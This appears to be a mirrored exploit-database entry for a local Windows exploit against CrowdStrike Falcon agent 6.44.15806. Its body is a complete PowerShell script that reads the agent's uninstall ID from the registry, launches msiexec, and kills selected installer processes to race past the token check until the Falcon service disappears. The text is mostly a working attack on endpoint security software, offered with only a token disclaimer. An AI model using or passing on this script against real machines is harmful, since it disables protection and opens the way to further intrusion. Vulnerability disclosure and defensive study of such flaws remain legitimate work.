Crowdstrike falcon agent6.44.15806 uninstall without installation token Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-03-30 | Type : local | Platform : windows
This exploit / vulnerability Crowdstrike falcon agent6.44.15806 uninstall without installation token is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress.


$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
{
$uninstall_uuid = $obj.Name.Split("\")[6]
}
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while($true)
{
if (get-process -Name "CSFalconService") {
Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {

if (-Not $g_msiexec_instances.contains($_.id)){
$g_msiexec_instances.Add($_.id)
if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
Start-Sleep -Milliseconds 100
Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
stop-process -Force -Id $g_msiexec_instances[-1]
}

}

}
} else {
Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
break
}
}